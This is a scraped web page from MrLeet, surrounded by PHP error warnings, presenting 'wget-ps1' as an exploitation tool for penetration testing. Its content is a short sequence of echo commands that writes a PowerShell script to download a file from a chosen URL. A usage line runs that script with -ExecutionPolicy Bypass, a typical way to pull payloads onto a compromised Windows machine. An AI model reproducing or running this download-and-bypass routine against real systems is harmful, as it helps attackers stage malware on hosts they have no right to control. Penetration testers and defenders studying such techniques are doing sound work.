Warning: PHP Request Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0

Warning: PHP Request Startup: Session ini settings cannot be changed after headers have already been sent in Unknown on line 0

Warning: session_start(): Session cannot be started after headers have already been sent in /home/admud64/mrleet.com/user/database_connection.php on line 5
wget-ps1- exploitation tool used and required in Penetration Testing ~ MrLeet

Title: wget-ps1- exploitation tool used and required in Penetration TestingAuthor: ajayverma
Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Make sure to change the values for $url and $file before sending the commands

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[---URL (with filepath)---]" >> wget.ps1
echo $file = "[---saved file name---]" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1



Submitted On: 2019-06-26 09:47:36




Warning: PHP Startup: Invalid date.timezone value '', using 'UTC' instead in Unknown on line 0